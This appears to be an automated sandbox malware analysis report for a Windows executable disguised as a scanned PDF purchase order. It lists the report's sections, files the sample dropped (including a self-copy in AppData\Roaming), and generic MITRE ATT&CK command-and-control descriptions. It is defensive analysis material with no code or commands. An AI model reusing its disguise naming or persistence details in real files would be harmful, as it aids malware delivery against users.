AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QeSBxb.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpy1nvyv.adq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm1pc1mb.ejw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3ucg1e3.5ka.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zan2lbe3.044.ps1

C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp

C:\Users\user\AppData\Local\Temp\tmpD080.tmp

C:\Users\user\AppData\Roaming\QeSBxb.exe

C:\Users\user\AppData\Roaming\QeSBxb.exe:Zone.Identifier

Windows Analysis Report
Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Function 08CD6B84 Relevance: 1.6, APIs: 1, Instructions: 58
nativeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre